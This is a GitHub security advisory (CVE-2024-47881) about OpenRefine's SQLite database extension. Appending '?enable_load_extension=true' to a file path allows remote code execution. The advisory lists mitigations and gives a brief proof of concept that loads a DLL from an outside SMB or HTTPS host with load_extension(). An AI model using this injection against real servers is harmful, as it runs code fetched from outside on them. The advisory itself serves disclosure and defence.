Skip to content

OpenRefine's SQLite integration allows filesystem access, remote code execution (RCE)

High severity GitHub Reviewed Published Oct 24, 2024 in OpenRefine/OpenRefine • Updated Oct 24, 2024

Package

maven org.openrefine:database (Maven)

Affected versions

>= 3.4-beta, < 3.8.3

Patched versions

3.8.3

Description

Summary

In the database extension, the "enable_load_extension" property can be set for the SQLite integration, enabling an attacker to load (local or remote) extension DLLs and so run arbitrary code on the server.

The attacker needs to have network access to the OpenRefine instance.

Details

The database extension, with some restrictions, lets users connect to any database they wish by filling in different parts of the JDBC URL that is used. For the SQLite integration, the extension expects a file path pointing to a database file (or a place where such a file can be created). This means that users can:

  • Read files on local or SMB filesystems, provided they are SQLite databases.
  • Write to files on local or SMB filesystems, as long as those files are either SQLite databases or empty.

This seems to be the expected behavior.

However, by adding ?enable_load_extension=true to the filename, a feature is toggled that additionally allows loading and executing shared libraries mentioned in queries, leading to remote code execution. On Windows specifically, those libraries may also come from shared folders.

Possible mitigation and hardening steps could include:

  • Having users upload the SQLite database file they want to look at, storing it under some safe name, then opening that, rather than accepting a file path
  • If that is not feasible: making the path relative to, and checking that it does not escape, the workspace directory
  • If that is also not feasible: adding additional checks so that the path at least does not point to other machines or add JDBC parameters
  • Always using the READONLY open mode
  • Explicitly setting enable_load_extension to off
  • Enforcing stricter limits and similar precautions

PoC

Tested on a Windows 11 machine.

  1. Start OpenRefine and choose "Create project", "Database", database type "SQLite".
  2. Type a writable file path followed by ?enable_load_extension=true.
  3. Click Connect. The connection should succeed.
  4. Use SELECT load_extension('\\wandernauta.nl\public\libcalculator.dll'); as the query.
  5. Assuming there are no firewalls in the way, a few Windows calculators should open.

The same file is available from https://wandernauta.nl/libcalculator.dll if needed.

Impact

Remote code execution for attackers with network access to OpenRefine.

References

@wetneb wetneb published to OpenRefine/OpenRefine Oct 24, 2024
Published to the GitHub Advisory Database Oct 24, 2024
Reviewed Oct 24, 2024
Last updated Oct 24, 2024

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

EPSS score

0.087%
(39th percentile)

Weaknesses

No CWEs

CVE ID

CVE-2024-47881

GHSA ID

GHSA-87cf-j763-vvh8

Source code

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.